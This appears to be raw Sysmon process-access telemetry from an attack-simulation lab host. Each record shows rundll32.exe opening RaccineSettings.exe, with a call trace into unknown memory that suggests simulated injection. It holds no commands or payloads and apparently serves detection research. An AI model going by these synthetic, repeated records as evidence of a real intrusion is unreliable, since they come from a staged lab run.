Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083070Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083069Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083068Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083067Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083066Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083065Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083064Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083063Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083062Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083061Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083060Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083059Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083058Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083057Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083056Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083055Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083054Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083053Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083052Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083051Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083050Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083049Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083048Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083047Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083046Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083045Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083044Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083043Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083042Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083041Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083040Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083039Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083038Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083037Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083036Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083035Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083034Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083033Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083032Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083031Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083030Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083029Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083028Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083027Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083026Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083025Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083024Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083023Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083022Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083021Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083020Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083019Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083018Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083017Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083016Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083015Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083014Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083013Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083012Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083011Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083010Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083009Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083008Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083007Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 